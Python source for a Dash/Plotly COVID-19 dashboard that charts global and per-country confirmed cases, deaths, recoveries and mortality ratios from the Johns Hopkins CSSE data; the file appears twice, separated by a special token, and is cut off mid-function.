xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). 
mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} else: options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). 
mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). 
mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} @app.callback(Output(component_id='box-1', component_property='figure'), [ Input(component_id='main-dropdown', component_property='value'), Input( component_id='main-dropdown-2', component_property='value')]) def update_maingraph(selected_country, selected_graph): if selected_graph is None and selected_country is None: selected_country = 'Canada' figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, automargin=True, showline=True, mirror 
=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph is None and selected_country is not None: figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, automargin=True, showline=True, mirror =False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph == 'Total and Daily Confirmed Cases': figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df. loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode= 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df. 
loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode= 'lines', fill='tozeroy')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} else: cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F', 'Recovered': '#009E73'} figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x= final_df.loc[final_df['Country_Region'] == selected_country, 'Date'], y=final_df.loc[final_df['Country_Region'] == selected_country, selected_graph], marker_color=cols_dict[ selected_graph])] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, selected_graph].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title='Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} if __name__ == '__main__': app.run_server() <|reserved_special_token_1|> # -*- coding: utf-8 -*- """ Created on Fri Apr 10 01:03:35 2020 @author: Jordan """ import pandas as pd import numpy as np import matplotlib.pyplot as plt from datetime import date ## from COVID19_Simple import * from COVID19_Diff import calc_diff_country ### Dash 
Stuff ### import dash import dash_core_components as dcc import dash_html_components as html from dash.dependencies import Input, Output import plotly.graph_objects as go import math ### Initial Code Block; Set Up Data ### urls = ['https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv', 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv', 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv'] ### Base Country Data (and Transformations) final_df = pd.read_csv('C:/Users/Jordan/Documents/COVID19/final_df.csv') final_df = calc_diff_country(final_df) final_df['Date'] = pd.to_datetime(final_df['Date']) final_df['Country_Region'] = final_df['Country_Region'].astype(str) ### 1000 Cases, 10 Deaths, 10 Recovered ### (Global) ## 1000 Cases ## cases_1000_start = final_df.loc[(final_df['Confirmed'] >= 1000) & (final_df['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()['Date'] cases_1000_start = cases_1000_start.reset_index() cases_1000_start = cases_1000_start.rename(columns={"Date":"Start_Date"}) final_df['Country_Region'] = final_df['Country_Region'].str.strip() cases_1000_start = pd.merge(cases_1000_start,final_df, on = ['Country_Region'],how='right') cases_1000_start['Start_Date'] = pd.to_datetime(cases_1000_start['Start_Date']) cases_1000_start['Date'] = pd.to_datetime(cases_1000_start['Date']) cases_1000_start = cases_1000_start[cases_1000_start['Start_Date'].notna()] cases_1000_start['Days Since 1000 Cases'] = (cases_1000_start['Date'] - cases_1000_start['Start_Date']).dt.days ## 100 Deaths ## deaths_100_start = final_df.loc[(final_df['Deaths'] >= 100) & (final_df['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()['Date'] deaths_100_start = 
deaths_100_start.reset_index() deaths_100_start = deaths_100_start.rename(columns={"Date":"Start_Date"}) final_df['Country_Region'] = final_df['Country_Region'].str.strip() deaths_100_start = pd.merge(deaths_100_start,final_df, on = ['Country_Region'],how='right') deaths_100_start['Start_Date'] = pd.to_datetime(deaths_100_start['Start_Date']) deaths_100_start['Date'] = pd.to_datetime(deaths_100_start['Date']) deaths_100_start = deaths_100_start[deaths_100_start['Start_Date'].notna()] deaths_100_start['Days Since 100 Deaths'] = (deaths_100_start['Date'] - deaths_100_start['Start_Date']).dt.days ## Mortality Ratios ## mort = final_df.groupby(['Country_Region'])['Date'].max().reset_index() mort = pd.merge(mort, final_df, on=['Country_Region', 'Date'], how='left') mort['Mortality_Percent'] = (mort['Deaths'] / mort['Confirmed'])*100.00 colors_dict_global = {'Europe':'#1D6996','Asia':'#CC503E','Africa':'#94346E', 'North America':'#38A6A5', 'Middle East': '#EDAD08', 'South America':'#E17C05', 'Caribbean & Central America':'#0F8554', 'Oceania':'#73AF48'} ### Dash Portion of the Script ### external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css'] app = dash.Dash(__name__, external_stylesheets=external_stylesheets) server=app.server app.layout = html.Div(children=[ html.H2(children='COVID-19 Dashboard'), html.H4(children='A Basic Dashboard to Help Track the COVID-19 Pandemic'), html.Br(), html.H5(children='Global View'), html.P(children='The Global View highlights how Covid-19 is affecting countries across the world, and how the pandemic is expanding on a country by country basis. 
The Global View includes the following:'), html.Div([html.Ul([html.Li([html.B('Cumulative Cases by Country Since First 1000 Cases: '),'This allows us to see how cases are spreading since the first 1000 Cases on a country by country basis']), html.Li([html.B('Cumulative Cases by Country Since First 100 Deaths: '),'This allows us to see COVID-19 fatalities since the first 100 Deaths on a country by country basis']), html.Li([html.B('Observed Case - Mortality Ratio (Top 20 Countries by Confirmed Cases): '), 'This allows us to see the percentage of COVID19 fatalities based on reported cases and deaths. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)']), html.Li([html.B('Recoveries vs. Deaths By Country (Countries with over 100 deaths and 100 recoveries: '), 'This plots Recoveries against Deaths on a country by country basis. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)'])])], style={'font-size': 12}), html.Br(), dcc.Dropdown(id='global-dropdown', options=[{'label':y, 'value':y} for y in ['Global Cases Trend', 'Global Deaths Trend', '% Mortality by Confirmed Cases (Top 20 Countries)','Recoveries vs. Deaths By Country']], placeholder = 'Pick Graphs From Here...'), dcc.Graph(id='global-box-1'), html.Br(), html.H5(children='Country View'), html.P('The Country view allows us to see a closer look on how the COVID-19 Pandemic has expanded. As opposed to a high level aggregation, the Country View provides a day by day time series analysis of the effects of COVID-19. 
The Country View includes the following:'), html.Div(style={'font-size': 12}, children=[html.Ul([html.Li([html.B('Confirmed: '), 'Cumulative Confirmed Cases of COVID-19 since January 22nd, 2020']), html.Li([html.B('Recovered: '), 'Cumulative Recovered Cases of COVID-19 since January 22nd, 2020']), html.Li([html.B('Deaths: '),'Cumulative Deaths from COVID-19 since January 22nd, 2020']), html.Li([html.B('Total and Daily Confirmed Cases: '), 'Cumulative and Daily Cases Since January 22nd, 2020. This illustrates the curve of daily cases in relation to the total cases for a country'])])]), dcc.Dropdown(id='main-dropdown', options=[{'label': x, 'value': x} for x in list(final_df.Country_Region.unique())], placeholder = 'Pick a Country From Here...'), dcc.Dropdown(id='main-dropdown-2', placeholder = 'Pick Graphs From Here...'), dcc.Graph(id='box-1'), html.Div([html.Div([html.H6(children='Most Recent New Cases'), html.H1(id='btext1'), dcc.Graph(id='subplot1')], className = 'four columns', style={'color': '#648FFF'}), html.Div([html.H6(children='Most Recent Daily Deaths'), html.H1(id='btext2'), dcc.Graph(id='subplot2')], className = 'four columns', style={'color': '#DC267F'}), html.Div([html.H6(children='Most Recent Daily Recovered'), html.H1(id='btext3'), dcc.Graph(id='subplot3')], className = 'four columns', style={'color': '#009E73', 'layout':'right'})], className="row") ]) ## Callback Functionality ## @app.callback( Output(component_id='global-box-1', component_property='figure'), [Input(component_id='global-dropdown', component_property='value')]) def global_update(select_global): if select_global == 'Global Cases Trend' or select_global is None: fig1000 = [] anno = [] for group, dataframe in cases_1000_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 1000 Cases']) trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di['Confirmed'].tolist(), mode='lines', line=dict(color=colors_dict_global[list(di.loc[:, 'Continent'])[0]], 
width=1), opacity=0.6, text= di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate='<b>%{text}</b><br>'+'<br>Confirmed Cases: %{y}<br>'+'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 1000 Cases'].max()+1.5), 'y':np.log10(int(di['Confirmed'].max())), 'xref':'x', 'yref':'y', 'showarrow':False, 'text':list(di.loc[:, 'Country_Region'])[0], 'xanchor':'right', 'yanchor':'middle', 'align':'center', 'font':{'size':8, 'color':'black'}, 'bordercolor':"#ffffff", 'borderwidth':1, 'borderpad':1, 'bgcolor':"#ffffff", 'opacity':0.6} fig1000.append(trace) anno.append(a) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start['Days Since 1000 Cases'].max())), y = [1000 * (math.exp(0.2310491 * i)) for i in list(np.arange(cases_1000_start['Days Since 1000 Cases'].max()))], name='Cases Double Every 3 Days', mode='lines', opacity=.25, line = dict(color='grey', width=3, dash='dash'), text=['# of Cases Double Every 3 Days'], hovertemplate='<b>Cases Double Every 3 Days</b>', showlegend=True)) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start['Days Since 1000 Cases'].max())), y = [1000 * (math.exp(0.099021 * i)) for i in list(np.arange(cases_1000_start['Days Since 1000 Cases'].max()))], name='Cases Double Every 7 Days', mode='lines', opacity=.25, line = dict(color='grey', width=3, dash='dot'), text=['# of Cases Double Every 7 Days'], hovertemplate='<b>Cases Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title':'Number of Confirmed Cases', 'range':[np.log10(1000), np.log10(cases_1000_start['Confirmed'].max() * 1.10)], 'type':'log', 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False}, title='Overall Confirmed Cases', xaxis={'title': 'Days Since First 1000 Cases', 'range': [0, cases_1000_start['Days Since 1000 Cases'].max()], 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 
'showline':True, 'mirror':False}, height=750, hovermode='closest', annotations=anno) fig_global={'data':fig1000, 'layout': layout_global} return fig_global elif select_global == 'Global Deaths Trend': fig100 = [] anno = [] for group, dataframe in deaths_100_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 100 Deaths']) trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di['Deaths'].tolist(), mode='lines', line=dict(color=colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=1), opacity=0.6, text= di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate='<b>%{text}</b><br>'+'<br>Deaths: %{y}<br>'+'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a={'x': int(di['Days Since 100 Deaths'].max()+1.5), 'y':np.log10(int(di['Deaths'].max())), 'xref':'x', 'yref':'y', 'showarrow':False, 'text':list(di.loc[:, 'Country_Region'])[0], 'xanchor':'right', 'yanchor':'middle', 'align':'center', 'font':{'size':8, 'color':'black'}, 'bordercolor':"#ffffff", 'borderwidth':1, 'borderpad':1, 'bgcolor':"#ffffff", 'opacity':0.6} fig100.append(trace) anno.append(a) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start['Days Since 100 Deaths'].max())), y = [100 * (math.exp(0.2310491 * i)) for i in list(np.arange(deaths_100_start['Days Since 100 Deaths'].max()))], name='Deaths Double Every 3 Days', mode='lines', opacity=.25, line = dict(color='grey', width=3, dash='dash'), text=['# of Deaths Double Every 3 Days'], hovertemplate='<b>Deaths Double Every 3 Days</b>', showlegend=True)) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start['Days Since 100 Deaths'].max())), y = [100 * (math.exp(0.099021 * i)) for i in list(np.arange(deaths_100_start['Days Since 100 Deaths'].max()))], name='Deaths Double Every 7 Days', mode='lines', opacity=.25, line = dict(color='grey', width=3, dash='dot'), text=['# of Deaths Double Every 7 Days'], hovertemplate='<b>Deaths Double Every 7 Days</b>', showlegend=True)) 
layout_global = go.Layout(yaxis={'title':'Number of Deaths', 'range':[np.log10(100), np.log10(cases_1000_start['Deaths'].max() * 1.10)], 'type':'log', 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False}, title='Overall Deaths', xaxis={'title': 'Days Since First 100 deaths', 'range': [0, deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'showline':True, 'mirror':False}, height=750, hovermode='closest', annotations=anno) fig_global={'data':fig100, 'layout': layout_global} return fig_global elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)': figmort = [] anno =[] m = mort.sort_values(by=['Confirmed'], ascending=False).head(20) m = m.sort_values(by=['Mortality_Percent'], ascending=True).reset_index() for i in range(len(m)): m1 = m.loc[i, 'Country_Region'] #m1 = [str(i) for i in m1] m2 = m.loc[i, 'Mortality_Percent'] #m2 = [str(round(i, 2)) for i in m2] trace = go.Bar(name='Observed Case - Mortality Ratio', x = [m2], y= [m1], text = [round(m.loc[i, 'Mortality_Percent'], 2)], orientation ='h', textposition='auto', marker = dict(color='#FFB000', opacity=0.6, line=dict(color='rgba(255,176,0, 1)', width=1)), hovertemplate='<b>%{y}</b><br>'+'<br>Observed Case Mortaility Pct: %{text}&#37;<br>', showlegend=False) figmort.append(trace) layout_global = go.Layout(yaxis={'title':'Country / Region','fixedrange':True, 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Observed Case - Mortality Ratio', xaxis={'title': '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [0, m['Mortality_Percent'].max() + 2], 'fixedrange':True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=750, hovermode='closest') fig_global={'data':figmort, 'layout': layout_global} return fig_global elif select_global == 'Recoveries vs. 
Deaths By Country': figscat = [] rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >=100)].reset_index() for i in range(len(rc)): scat = go.Scatter( x=[rc.loc[i, 'Deaths']], y=[rc.loc[i, 'Recovered']], mode='markers+text', text=[rc.loc[i, 'Country_Region']], marker_color=(colors_dict_global[rc.loc[i, 'Continent']]), showlegend=False, marker=dict(size=12,line_width=1, opacity=0.75), hovertemplate='<b>%{text}</b><br>'+'<br>Recoveries: %{y}<br>'+'Deaths: %{x}<br>', textposition='bottom center', textfont=dict(size=10, color='rgba(0, 0, 0, 0.6)') ) figscat.append(scat) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(), 3)), y = [i for i in list(np.linspace(100, rc['Deaths'].max(), 3))], mode='lines', name='Deaths = Recoveries', opacity=.25, line = dict(color='grey', width=1), text=['# of Deaths = # of Recoveries'], hovertemplate='<b># of Deaths = # of Recoveries</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(), 3)), y = [i*2 for i in list(np.linspace(100, rc['Deaths'].max(), 3))], mode='lines', name='2 Recoveries for Every Death', opacity=.25, line = dict(color='green', width=3, dash='dash'), text=['2 Recoveries for Every Death'], hovertemplate='<b>2 Recoveries for Every Death</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(), 3)), y = [i/2 for i in list(np.linspace(100, rc['Deaths'].max(), 3))], mode='lines', name='2 Deaths for Every Recovery', opacity=.25, line = dict(color='firebrick', width=3, dash='dash'), text=['2 Deaths for Every Recovery'], hovertemplate='<b>2 Deaths for Every Recovery</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title':'Number of Recoveries','fixedrange':True, 'automargin': True, 'range':[np.log10(100), np.log10(rc['Recovered'].max() * 1.10)], 'type':'log', 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False}, title='Recoveries vs. 
Deaths, By Country', xaxis={'title': 'Number of Deaths','fixedrange':True, 'range':[np.log10(100), np.log10(rc['Deaths'].max() * 1.10)], 'type':'log', 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False}, height=750, hovermode='closest') fig_global={'data':figscat, 'layout': layout_global} return fig_global @app.callback( [Output(component_id='main-dropdown-2', component_property = 'options'), Output(component_id='btext1', component_property='children'), Output(component_id='subplot1', component_property = 'figure'), Output(component_id='btext2', component_property='children'), Output(component_id='subplot2', component_property = 'figure'), Output(component_id='btext3', component_property='children'), Output(component_id='subplot3', component_property = 'figure')], [Input(component_id='main-dropdown', component_property = 'value')]) def update_country(selected_country): if selected_country is None: selected_country = 'Canada' options = ['Confirmed','Recovered','Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6), go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#648FFF', width = 3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Daily Confirmed Cases: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 
'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width = 3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#009E73', width = 3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h')) return vals,final_df.loc[(final_df['Date'] == 
final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'],{'data':trace_1, 'layout': layout_t1},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'],{'data':trace_2, 'layout':layout_t2},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Recovered_Diff'],{'data':trace_3, 'layout':layout_t3} else: options = ['Confirmed','Recovered','Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6), go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#648FFF', width = 3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Daily Confirmed Cases: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == 
selected_country),'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width = 3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#009E73', width = 3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, 